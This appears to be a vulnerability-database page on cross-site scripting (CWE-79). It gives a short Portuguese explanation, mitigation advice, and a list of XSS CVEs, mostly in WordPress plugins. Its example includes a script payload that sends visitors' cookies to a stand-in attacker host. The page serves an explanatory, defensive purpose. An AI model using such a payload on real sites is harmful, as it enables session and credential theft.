Fallos del tipo CWE-79

29.881 resultados

Injeção de Script entre Sites (XSS)

Ocorre quando uma aplicação web insere dados não validados ou não escapados diretamente em páginas HTML, permitindo que um atacante injete código JavaScript malicioso. Esse script é executado no navegador da vítima, roubando cookies, tokens de autenticação ou realizando ações em nome do usuário.

Ejemplo

Um site de comentários que exibe a entrada do usuário sem sanitização: se alguém escreve <script>fetch('http://atacante.com/?cookie='+document.cookie)</script> como comentário, o navegador de quem visualiza executa o script e envia seus cookies para o atacante.

Cómo mitigar

Sempre escapar (ou codificar em HTML) dados vindos do usuário antes de renderizar: use funções como htmlspecialchars() em PHP, textContent ao invés de innerHTML em JavaScript, ou use templates que escapam por padrão (como Jinja2, Vue com v-text). Implemente Content Security Policy (CSP) como camada adicional de defesa.

CVE-2024-41676MEDIUMMagento LTS vulnerable to stored Cross-site Scripting (XSS) in admin system configsEPSS 0.4%CVE-2023-32578MEDIUMWordPress Column-Matic Plugin <= 1.3.3 is vulnerable to Cross Site Scripting (XSS)EPSS 0.4%CVE-2025-22546MEDIUMWordPress jQuery TwentyTwenty plugin <= 1.0 - Cross Site Scripting (XSS) vulnerabilityEPSS 0.4%CVE-2023-32576MEDIUMWordPress Locatoraid Store Locator Plugin <= 3.9.18 is vulnerable to Cross Site Scripting (XSS)EPSS 0.4%CVE-2025-2086MEDIUMStarSea99 starsea-mall update cross site scriptingEPSS 0.4%CVE-2025-9422MEDIUMoitcode samarium Team Image team cross site scriptingEPSS 0.4%CVE-2023-23641MEDIUMWordPress Uji Popup Plugin <= 1.4.3 is vulnerable to Cross Site Scripting (XSS)EPSS 0.4%CVE-2024-49758MEDIUMLibreNMS has a stored XSS in ExamplePlugin with Device's NotesEPSS 0.4%CVE-2023-37994MEDIUMWordPress Art Decoration Shortcode Plugin <= 1.5.6 is vulnerable to Cross Site Scripting (XSS)EPSS 0.4%CVE-2025-22529MEDIUMWordPress WE Blocks <= 1.3.5 - Cross Site Scripting (XSS) vulnerabilityEPSS 0.4%CVE-2023-23873MEDIUMWordPress BBSpoiler Plugin <= 2.01 is vulnerable to Cross Site Scripting (XSS)EPSS 0.4%CVE-2023-31217MEDIUMWordPress User Location and IP Plugin <= 1.6 is vulnerable to Cross Site Scripting (XSS)EPSS 0.4%CVE-2023-23670MEDIUMWordPress Fancy Comments WordPress Plugin <= 1.2.10 is vulnerable to Cross Site Scripting (XSS)EPSS 0.4%CVE-2023-27443MEDIUMWordPress Simple Vimeo Shortcode Plugin <= 2.9.1 is vulnerable to Cross Site Scripting (XSS)EPSS 0.4%CVE-2023-30780MEDIUMWordPress User IP and Location Plugin <= 2.2 is vulnerable to Cross Site Scripting (XSS)EPSS 0.4%CVE-2023-23877MEDIUMWordPress Pinterest RSS Widget Plugin <= 2.3.1 is vulnerable to Cross Site Scripting (XSS)EPSS 0.4%CVE-2025-22511MEDIUMWordPress Slides & Presentations Plugin <= 0.0.39 - Cross Site Scripting (XSS) vulnerabilityEPSS 0.4%CVE-2023-22717MEDIUMWordPress FormCraft Plugin <= 1.2.6 is vulnerable to Cross Site Scripting (XSS)EPSS 0.4%CVE-2023-23817MEDIUMWordPress Simple PDF Viewer Plugin <= 1.9 is vulnerable to Cross Site Scripting (XSS)EPSS 0.4%CVE-2024-11875MEDIUMAdd infos to the events calendar <= 1.4.1 - Authenticated (Contributor+) Stored Cross-Site ScriptingEPSS 0.4%